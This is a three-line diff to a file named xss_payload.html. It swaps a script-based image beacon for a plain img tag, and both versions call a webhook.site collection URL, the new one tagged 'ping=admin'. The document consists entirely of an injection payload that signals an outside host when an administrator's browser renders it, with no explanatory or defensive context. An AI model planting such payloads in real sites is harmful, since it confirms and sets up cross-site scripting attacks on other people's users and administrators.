--- a/xss_payload.html
+++ b/xss_payload.html
@@ -1,3 +1,1 @@
-<script>
-new Image().src = "https://webhook.site/64b963bc-2bfe-4ed0-aa14-b7b423f02b8c?img=ok"
-</script>
+<img src="https://webhook.site/64b963bc-2bfe-4ed0-aa14-b7b423f02b8c?ping=admin">
